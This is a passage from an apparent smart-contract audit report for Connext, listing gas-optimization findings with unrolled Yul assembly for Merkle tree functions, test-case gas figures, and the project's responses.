sload(add(TREE_SLOT, 2))) mstore(0x20, Z_2) _current := keccak256(0, 0x40) i := 2 break } if and(_index, shl(3, 1)) { mstore(0, sload(add(TREE_SLOT, 3))) mstore(0x20, Z_3) _current := keccak256(0, 0x40) i := 3 65 break } if and(_index, shl(4, 1)) { mstore(0, sload(add(TREE_SLOT, 4))) mstore(0x20, Z_4) _current := keccak256(0, 0x40) i := 4 break } if and(_index, shl(5, 1)) { mstore(0, sload(add(TREE_SLOT, 5))) mstore(0x20, Z_5) _current := keccak256(0, 0x40) i := 5 break } if and(_index, shl(6, 1)) { mstore(0, sload(add(TREE_SLOT, 6))) mstore(0x20, Z_6) _current := keccak256(0, 0x40) i := 6 break } if and(_index, shl(7, 1)) { mstore(0, sload(add(TREE_SLOT, 7))) mstore(0x20, Z_7) _current := keccak256(0, 0x40) i := 7 break } if and(_index, shl(8, 1)) { mstore(0, sload(add(TREE_SLOT, 8))) mstore(0x20, Z_8) _current := keccak256(0, 0x40) i := 8 break } if and(_index, shl(9, 1)) { mstore(0, sload(add(TREE_SLOT, 9))) mstore(0x20, Z_9) _current := keccak256(0, 0x40) i := 9 break } if and(_index, shl(10, 1)) { mstore(0, sload(add(TREE_SLOT, 10))) mstore(0x20, Z_10) _current := keccak256(0, 0x40) i := 10 break } if and(_index, shl(11, 1)) { mstore(0, sload(add(TREE_SLOT, 11))) mstore(0x20, Z_11) 66 _current := keccak256(0, 0x40) i := 11 break } if and(_index, shl(12, 1)) { mstore(0, sload(add(TREE_SLOT, 12))) mstore(0x20, Z_12) _current := keccak256(0, 0x40) i := 12 break } if and(_index, shl(13, 1)) { mstore(0, sload(add(TREE_SLOT, 13))) mstore(0x20, Z_13) _current := keccak256(0, 0x40) i := 13 break } if and(_index, shl(14, 1)) { mstore(0, sload(add(TREE_SLOT, 14))) mstore(0x20, Z_14) _current := keccak256(0, 0x40) i := 14 break } if and(_index, shl(15, 1)) { mstore(0, sload(add(TREE_SLOT, 15))) mstore(0x20, Z_15) _current := keccak256(0, 0x40) i := 15 break } if and(_index, shl(16, 1)) { mstore(0, sload(add(TREE_SLOT, 16))) mstore(0x20, Z_16) _current := keccak256(0, 0x40) i := 16 break } if and(_index, shl(17, 1)) { mstore(0, sload(add(TREE_SLOT, 17))) mstore(0x20, Z_17) _current := keccak256(0, 0x40) i := 17 break } if and(_index, shl(18, 1)) { mstore(0, sload(add(TREE_SLOT, 18))) mstore(0x20, Z_18) _current := keccak256(0, 0x40) i := 18 break } if and(_index, shl(19, 1)) { 67 mstore(0, sload(add(TREE_SLOT, 19))) mstore(0x20, Z_19) _current := keccak256(0, 0x40) i := 19 break } if and(_index, shl(20, 1)) { mstore(0, sload(add(TREE_SLOT, 20))) mstore(0x20, Z_20) _current := keccak256(0, 0x40) i := 20 break } if and(_index, shl(21, 1)) { mstore(0, sload(add(TREE_SLOT, 21))) mstore(0x20, Z_21) _current := keccak256(0, 0x40) i := 21 break } if and(_index, shl(22, 1)) { mstore(0, sload(add(TREE_SLOT, 22))) mstore(0x20, Z_22) _current := keccak256(0, 0x40) i := 22 break } if and(_index, shl(23, 1)) { mstore(0, sload(add(TREE_SLOT, 23))) mstore(0x20, Z_23) _current := keccak256(0, 0x40) i := 23 break } if and(_index, shl(24, 1)) { mstore(0, sload(add(TREE_SLOT, 24))) mstore(0x20, Z_24) _current := keccak256(0, 0x40) i := 24 break } if and(_index, shl(25, 1)) { mstore(0, sload(add(TREE_SLOT, 25))) mstore(0x20, Z_25) _current := keccak256(0, 0x40) i := 25 break } if and(_index, shl(26, 1)) { mstore(0, sload(add(TREE_SLOT, 26))) mstore(0x20, Z_26) _current := keccak256(0, 0x40) i := 26 break } 68 if and(_index, shl(27, 1)) { mstore(0, sload(add(TREE_SLOT, 27))) mstore(0x20, Z_27) _current := keccak256(0, 0x40) i := 27 break } if and(_index, shl(28, 1)) { mstore(0, sload(add(TREE_SLOT, 28))) mstore(0x20, Z_28) _current := keccak256(0, 0x40) i := 28 break } if and(_index, shl(29, 1)) { mstore(0, sload(add(TREE_SLOT, 29))) mstore(0x20, Z_29) _current := keccak256(0, 0x40) i := 29 break } if and(_index, shl(30, 1)) { mstore(0, sload(add(TREE_SLOT, 30))) mstore(0x20, Z_30) _current := keccak256(0, 0x40) i := 30 break } if and(_index, shl(31, 1)) { mstore(0, sload(add(TREE_SLOT, 31))) mstore(0x20, Z_31) _current := keccak256(0, 0x40) i := 31 break } _current := Z_32 i := 32 break } if gt(i, 30) { break } { if lt(i, 1) { switch and(_index, shl(1, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_1) } default { mstore(0, sload(add(TREE_SLOT, 1))) mstore(0x20, _current) } 69 _current := keccak256(0, 0x40) } if lt(i, 2) { switch and(_index, shl(2, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_2) } default { mstore(0, sload(add(TREE_SLOT, 2))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 3) { switch and(_index, shl(3, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_3) } default { mstore(0, sload(add(TREE_SLOT, 3))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 4) { switch and(_index, shl(4, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_4) } default { mstore(0, sload(add(TREE_SLOT, 4))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 5) { switch and(_index, shl(5, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_5) } default { mstore(0, sload(add(TREE_SLOT, 5))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 6) { switch and(_index, shl(6, 1)) case 0 { 70 mstore(0, _current) mstore(0x20, Z_6) } default { mstore(0, sload(add(TREE_SLOT, 6))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 7) { switch and(_index, shl(7, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_7) } default { mstore(0, sload(add(TREE_SLOT, 7))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 8) { switch and(_index, shl(8, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_8) } default { mstore(0, sload(add(TREE_SLOT, 8))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 9) { switch and(_index, shl(9, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_9) } default { mstore(0, sload(add(TREE_SLOT, 9))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 10) { switch and(_index, shl(10, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_10) } default { mstore(0, sload(add(TREE_SLOT, 10))) mstore(0x20, _current) 71 } _current := keccak256(0, 0x40) } if lt(i, 11) { switch and(_index, shl(11, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_11) } default { mstore(0, sload(add(TREE_SLOT, 11))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 12) { switch and(_index, shl(12, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_12) } default { mstore(0, sload(add(TREE_SLOT, 12))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 13) { switch and(_index, shl(13, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_13) } default { mstore(0, sload(add(TREE_SLOT, 13))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 14) { switch and(_index, shl(14, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_14) } default { mstore(0, sload(add(TREE_SLOT, 14))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 15) { 72 switch and(_index, shl(15, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_15) } default { mstore(0, sload(add(TREE_SLOT, 15))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 16) { switch and(_index, shl(16, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_16) } default { mstore(0, sload(add(TREE_SLOT, 16))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 17) { switch and(_index, shl(17, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_17) } default { mstore(0, sload(add(TREE_SLOT, 17))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 18) { switch and(_index, shl(18, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_18) } default { mstore(0, sload(add(TREE_SLOT, 18))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 19) { switch and(_index, shl(19, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_19) } default { 73 mstore(0, sload(add(TREE_SLOT, 19))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 20) { switch and(_index, shl(20, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_20) } default { mstore(0, sload(add(TREE_SLOT, 20))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 21) { switch and(_index, shl(21, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_21) } default { mstore(0, sload(add(TREE_SLOT, 21))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 22) { switch and(_index, shl(22, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_22) } default { mstore(0, sload(add(TREE_SLOT, 22))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 23) { switch and(_index, shl(23, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_23) } default { mstore(0, sload(add(TREE_SLOT, 23))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } 74 if lt(i, 24) { switch and(_index, shl(24, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_24) } default { mstore(0, sload(add(TREE_SLOT, 24))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 25) { switch and(_index, shl(25, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_25) } default { mstore(0, sload(add(TREE_SLOT, 25))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 26) { switch and(_index, shl(26, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_26) } default { mstore(0, sload(add(TREE_SLOT, 26))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 27) { switch and(_index, shl(27, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_27) } default { mstore(0, sload(add(TREE_SLOT, 27))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 28) { switch and(_index, shl(28, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_28) 75 } default { mstore(0, sload(add(TREE_SLOT, 28))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 29) { switch and(_index, shl(29, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_29) } default { mstore(0, sload(add(TREE_SLOT, 29))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 30) { switch and(_index, shl(30, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_30) } default { mstore(0, sload(add(TREE_SLOT, 30))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } if lt(i, 31) { switch and(_index, shl(31, 1)) case 0 { mstore(0, _current) mstore(0x20, Z_31) } default { mstore(0, sload(add(TREE_SLOT, 31))) mstore(0x20, _current) } _current := keccak256(0, 0x40) } } break } } } ... bytes32 internal constant Z_32 = hex"27ae5ba08d7291c96c8cbddcc148bf48a6d68c7974b94356f53754ef6171d757"; ,! } 76 Gas savings according to test cases: test_RootManager__propagate_shouldSendToAllSpokes(bytes32) (gas: -5323 (-0.201%)) test_RootManager__propagate_shouldSendToSpoke(bytes32) (gas: -6573 (-1.753%)) test_MultichainSpokeConnector_processMessage_revertIfWrongDataLength(uint8) (gas: 1470 (3.783%)) test_MainnetSpokeConnector__sendMessage_fromRootManagerWorks() (gas: -10657 (-18.110%)) test_messageFlowsWork() (gas: 650754 (21.106%)) test_Merkle__insert_shouldUpdateCount() (gas: -65402 (-25.713%)) test_GnosisSpokeConnector__sendMessage_shouldWork() (gas: -21314 (-34.402%)) test_OptimismSpokeConnector__sendMessage_works() (gas: -21314 (-34.472%)) test_MainnetSpokeConnector__sendMessage_failsIfCallerNotRootManager() (gas: -10657 (-40.132%)) test_MultichainSpokeConnector_sendMessage_sendMessageAndEmitEvent() (gas: -21314 (-40.516%)) test_PolygonSpokeConnector__sendMessage_works() (gas: -21314 (-42.397%)) test_ArbitrumSpokeConnector__sendMessage_works() (gas: -31971 (-45.808%)) Overall gas change: 436385 (-258.615%) Note the extra gas in test_messageFlowsWork() is due to the library bytecode size getting really big and the number mostly represents the deployment gas overhead. The runtime gas saving for this test is actually around -75582. We can also mix and match the techniques used here to avoid the big increase in deployment cost. For example, we can decide to not unroll loops. It is recommended to add unit and differential tests for this function, especially if you are taking this suggestion into consideration. Connext: Unrolling implemented. Deployment costs are negligible because this library should just be used in MerkleTreeManager, which should NOT be subject to redeployment (it's entire purpose in being separate contract is maintaining data permanence). Solved in PR 2211. Spearbit: Verified. +5.4.15 The insert function in Merkle.sol can be optimized by using YUL, unrolling loops and using the scratch space Severity: Gas Optimization Context: Merkle.sol#L76 Description: If we use assembly. the scratch space for hashing and unrolling the loop, we can save some gas. Recommendation: /** * @notice Inserts a given node (leaf) into merkle tree. * @dev Reverts if the tree is already full. * @param node Element to insert into tree. * @return size uint256 Updated count (number of nodes in the tree). **/ function insert(Tree storage tree, bytes32 node) internal returns (uint256 size) { size = ++tree.count; if (size > MAX_LEAVES - 1) revert MerkleLib__insert_treeIsFull(); assembly { let TREE_SLOT := tree.slot for {} true {} { switch and(size, 1) case 0 { mstore(0, sload(TREE_SLOT)) mstore(0x20, node) node := keccak256(0, 0x40) 77 } default { sstore(TREE_SLOT, node) break } switch and(size, shl(1, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 1))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 1), node) break } switch and(size, shl(2, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 2))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 2), node) break } switch and(size, shl(3, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 3))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 3), node) break } switch and(size, shl(4, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 4))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 4), node) break } switch and(size, shl(5, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 5))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 5), node) break } switch and(size, shl(6, 1)) 78 case 0 { mstore(0, sload(add(TREE_SLOT, 6))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 6), node) break } switch and(size, shl(7, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 7))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 7), node) break } switch and(size, shl(8, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 8))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 8), node) break } switch and(size, shl(9, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 9))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 9), node) break } switch and(size, shl(10, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 10))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 10), node) break } switch and(size, shl(11, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 11))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 11), node) 79 break } switch and(size, shl(12, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 12))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 12), node) break } switch and(size, shl(13, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 13))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 13), node) break } switch and(size, shl(14, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 14))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 14), node) break } switch and(size, shl(15, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 15))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 15), node) break } switch and(size, shl(16, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 16))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 16), node) break } switch and(size, shl(17, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 17))) mstore(0x20, node) 80 node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 17), node) break } switch and(size, shl(18, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 18))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 18), node) break } switch and(size, shl(19, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 19))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 19), node) break } switch and(size, shl(20, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 20))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 20), node) break } switch and(size, shl(21, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 21))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 21), node) break } switch and(size, shl(22, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 22))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 22), node) break } 81 switch and(size, shl(23, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 23))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 23), node) break } switch and(size, shl(24, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 24))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 24), node) break } switch and(size, shl(25, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 25))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 25), node) break } switch and(size, shl(26, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 26))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 26), node) break } switch and(size, shl(27, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 27))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 27), node) break } switch and(size, shl(28, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 28))) mstore(0x20, node) node := keccak256(0, 0x40) } default { 82 sstore(add(TREE_SLOT, 28), node) break } switch and(size, shl(29, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 29))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 29), node) break } switch and(size, shl(30, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 30))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 30), node) break } switch and(size, shl(31, 1)) case 0 { mstore(0, sload(add(TREE_SLOT, 31))) mstore(0x20, node) node := keccak256(0, 0x40) } default { sstore(add(TREE_SLOT, 31), node) break } break } } } Runtime gas saved according to test cases: test_RootManager__propagate_shouldSendToSpoke(bytes32) (gas: -215 (-0.057%)) test_RootManager__propagate_shouldSendToAllSpokes(bytes32) (gas: -3176 (-0.120%)) test_Merkle__insert_shouldUpdateCount() (gas: -1750 (-0.688%)) test_MultichainSpokeConnector_processMessage_revertIfWrongDataLength(uint8) (gas: -1630 (-4.194%)) test_messageFlowsWork() (gas: 242592 (7.868%)) <--- due to deployment overhead cost mostly Overall gas change: 235821 (2.808%) Notes: 1. The above sketch does actually return the updated count, unlike the current implementation. 2. SHL(a, b) (where a and b are constants) in the sketch above (and also in the other comments) is a constant expression and the final result should be inlined by the compiler. You can check this fact or inline the final result yourself and save on compile time. We can also mix and match the techniques used here to avoid the big increase in deployment cost. For example, we can decide to not unroll loops. 83 It is recommended to add unit and differential tests for this function, especially if you are taking this suggestion into consideration. Connext: This is great work, but we'll definitely be converting the insert method to use an in-memory reference to the tree, not the tree in storage (for efficiency across multiple insertions, which should be the norm). In order to make this unrolling work, we'd need to switch to just mloading the tree instead in your assembly code. We don't have the internal capability to maintain Yul safely, so adding a large portion to core code paths seems inadvisable Spearbit: Acknowledged. +5.4.16 branchRoot function in Merkle.sol can be more optimized by using YUL, unrolling the loop and using the scratch space Severity: Gas Optimization Context: Merkle.sol#L149 Description: We can use assembly, unroll the loop in branchRoot, and use the scratch space to save gas. Recommendation: /** * @notice Calculates and returns the merkle root for the given leaf `_item`, * a merkle branch, and the index of `_item` in the tree. * @param _item Merkle leaf * @param _branch Merkle proof * @param _index Index of `_item` in tree * @return _current Calculated merkle root **/ function branchRoot( bytes32 _item, bytes32[TREE_DEPTH] memory _branch, uint256 _index ) internal pure returns (bytes32 _current) { assembly { _current := _item let BRANCH_DATA_OFFSET := _branch let f f := shl(5, and(_index, 1)) mstore(f, _current) mstore(sub(0x20, f), mload(BRANCH_DATA_OFFSET)) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(1, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 1)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(2, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 2)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(3, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 3)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(4, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 4)))) _current := keccak256(0, 0x40) 84 f := shl(5, iszero(and(_index, shl(5, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 5)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(6, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 6)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(7, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 7)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(8, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 8)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(9, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 9)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(10, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 10)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(11, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 11)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(12, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 12)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(13, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 13)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(14, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 14)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(15, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 15)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(16, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 16)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(17, 1)))) 85 mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 17)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(18, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 18)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(19, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 19)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(20, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 20)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(21, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 21)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(22, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 22)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(23, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 23)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(24, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 24)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(25, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 25)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(26, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 26)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(27, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 27)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(28, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 28)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(29, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 29)))) 86 _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(30, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 30)))) _current := keccak256(0, 0x40) f := shl(5, iszero(and(_index, shl(31, 1)))) mstore(sub(0x20, f), _current) mstore(f, mload(add(BRANCH_DATA_OFFSET, shl(5, 31)))) _current := keccak256(0, 0x40) } } Gas saved according to test cases (runtime gas saving is even more since some deployment gas overhead has been added due to a bigger code size): test_messageFlowsWork() (gas: -12332 (-0.400%)) test_MultichainSpokeConnector_processMessage_revertIfWrongDataLength(uint8) (gas: -2118 (-5.450%)) Overall gas change: -14450 (-5.850%) It is recommended to add unit and differential tests for this function, especially if you are taking this suggestion into consideration. Connext: Solved in PR 2211. Spearbit: Verified. +5.4.17 Replace divisions by powers of 2 by right shifts and multiplications by left shifts Severity: Gas Optimization Context: • Merkle.sol#L96 Description: When a variable X is divided (multiplied) by a power of 2 (C = 2 ˆ c) which is a constant value, the division (multiplication) operation can be replaced by a right (left) shift to save gas. Recommendation: Replace X / C by X >> c and X * C by X << c. Here C is a constant which equals to 2 ˆ c. Connext: Solved in PR 2211. Spearbit: Verified. +5.4.18 TypedMemView.castTo can be optimized by using bitmasks instead of multiple shifts Severity: Gas Optimization Context: TypedMemView.sol#L306-L307 Description: TypedMemView.castTo uses bit shifts to clear the type flag bits of a memView, instead masking can be used. Also an extra OR is used to calculate the final view. Recommendation: Save gas by changing to: newView := or( and(memView, LOW_27_BYTES_MASK), shl(_27_BYTES_IN_BITS, _newType) ) where LOW_27_BYTES_MASK and _27_BYTES_IN_BITS should be defined as: 87 uint256 private constant _27_BYTES_IN_BITS = 8 * 27; // <--- also used this named constant where ever 216 is used. ,! uint256 private constant LOW_27_BYTES_MASK = (1 << _27_BYTES_IN_BITS) - 1; This would remove 1 OR, 1 SHR and 1 SHL and adds 1 AND. Connext: Solved in PR 2510. Spearbit: Verified. +5.4.19 Make domain immutable in Facets Severity: Gas Optimization Context: LibConnextStorage.sol#L145 Description: Domain in Connector.sol is an immutable variable, however it is defined as a storage variable in LibConnextStorage.sol. Also once initialized in DiamondInit.sol, it cannot be updated again. To save gas, domain can be made an immutable variable to avoid reading from storage. Recommendation: There is a tradeoff between maintaining domain only at AppStorage vs maintaining it in facets. To make domain immutable: • Add domain as an immutable variable to BaseConnextFacet contract. Also add a constructor to initialize domain variable. Currently, these are the facets using s.domain: BridgeFacet.sol, RoutersFacet.sol#L554. Make sure to pass the correct domain value to their constructors. • AssetLogic.sol library also uses s.domain. Pass in the domain as a function argument explicitly from Facets instead of reading it from AppStorage. If applying this recommendation, note that the storage layout will change since now domain doesn't take a storage slot. Connext: After finishing the core work involved in addressing this issue, we discovered that the modifications to the unit tests - which currently rely on a mutable domain value - would require a lot of overhaul in order to use an immutable domain value. The amount of work required here would not fit in the current timeline for launch (short-term). Going to acknowledge this for now. It will be prioritized to be implemented via an upgrade in the future. Spearbit: Acknowledged. +5.4.20 Cache router balance in repayAavePortal() Severity: Gas Optimization Context: 